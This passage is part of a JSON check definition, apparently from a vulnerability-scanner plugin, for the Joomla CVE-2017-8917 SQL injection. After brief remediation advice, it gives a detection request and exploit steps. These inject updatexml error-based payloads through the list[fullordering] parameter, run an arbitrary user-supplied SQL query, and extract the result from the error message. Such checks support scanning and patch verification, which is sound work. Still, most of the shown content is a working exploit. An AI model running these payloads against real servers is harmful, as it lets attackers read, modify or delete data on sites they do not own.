Hackers can execute SQL statements directly, so as to control the whole server: data acquisition, data modification, data deletion, etc.
1. the data input by users should be strictly filtered in the web code.
2. deploy web application firewall to monitor database operation.
3. upgrade to the latest version.
", "References": [ "https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917" ], "HasExp": true, "ExpParams": [ { "name": "sql", "type": "input", "value": "select+database()" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1,updatexml(0x23,concat(0x7c,substring(md5(0x0c),1,10),0x7c),0x7c)", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$body", "operation": "contains", "value": "|58c89562f5|", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,({{{sql}}})),1)", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "500", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|XPATH syntax error:\\s+'(.*?)'" ] } ], "Tags": [ "SQL Injection" ], "CVEIDs": null, "CVSSScore": "0.0", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }